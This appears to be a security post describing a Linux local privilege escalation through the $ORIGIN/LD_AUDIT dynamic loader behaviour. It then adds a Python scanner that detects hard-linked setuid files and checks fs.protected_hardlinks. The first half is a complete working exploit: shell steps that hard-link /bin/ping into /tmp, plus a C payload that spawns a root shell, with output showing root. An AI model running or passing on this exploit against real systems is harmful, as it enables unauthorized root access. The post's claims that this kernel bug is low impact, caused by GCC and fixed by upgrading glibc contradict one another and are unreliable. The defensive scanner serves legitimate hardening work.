Linux 2.6 kernel local privilege escalation
2012-01-03 18:39
It is possible to exploit this flaw to execute arbitrary code as root. Please note, this is a low impact vulnerability that is only of interest to security professionals and system administrators. End users do not need to be concerned. Exploitation would look like the following.

```shell
# Create a directory in /tmp we can control.
$ mkdir /tmp/exploit

# Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target

# Open a file descriptor to the target binary (note: some users are surprised
# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).
$ exec 3< /tmp/exploit/target

# This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target*

# Remove the directory previously created
$ rm -rf /tmp/exploit/

# The /proc link should still exist, but now will be marked deleted.
$ ls -l /proc/$$/fd/3
lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().
$ cat > payload.c
void __attribute__((constructor)) init() {
    setuid(0);
    system("/bin/bash");
}
^D
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
$ ls -l /tmp/exploit
-rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit*

# Now force the link in /proc to load $ORIGIN via LD_AUDIT.
$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=500(taviso)
```

How to fix the vulnerability (this is a vulnerability caused by GCC): upgrade glibc.
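Added here as a defender-side check, not part of the original post: the precondition of the walkthrough above is a second hard link to a setuid binary inside a directory an unprivileged user controls. This Python script (assumed names, constructed sample tree) finds setuid/setgid files under a given root whose inode has more than one link, and reports whether `fs.protected_hardlinks`, the sysctl that blocks creating such links on Linux 3.6 and later, is enabled.

```python
import os
import stat
import tempfile


def find_suid_hardlinks(root):
    """Return (path, inode, nlink) for every setuid/setgid regular file under
    `root` whose inode has more than one hard link, i.e. a second name exists."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)      # lstat: a symlink is not a second name for the inode
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if not st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                continue                 # only privileged binaries matter for this check
            if st.st_nlink > 1:
                findings.append((full, st.st_ino, st.st_nlink))
    return findings


def protected_hardlinks_enabled():
    """True/False from fs.protected_hardlinks (Linux >= 3.6); None if the kernel lacks it."""
    try:
        with open("/proc/sys/fs/protected_hardlinks") as f:
            return f.read().strip() == "1"
    except OSError:
        return None


def make_demo_tree():
    """Constructed sample tree: a fake setuid 'binary' with a second hard link,
    plus a non-suid file with a second link that must not be reported."""
    root = tempfile.mkdtemp(prefix="suidscan-")
    target = os.path.join(root, "target")
    with open(target, "wb") as f:
        f.write(b"\x7fELF")              # contents are irrelevant to the check
    os.chmod(target, 0o4755)
    os.link(target, os.path.join(root, "alias"))
    plain = os.path.join(root, "plain")
    with open(plain, "wb") as f:
        f.write(b"data")
    os.link(plain, os.path.join(root, "plain2"))
    return root
```

Run `find_suid_hardlinks("/tmp")` (or any world-writable directory) on a real host; on a system with `protected_hardlinks_enabled()` returning True the `ln /bin/ping` step above fails with EPERM for non-owners.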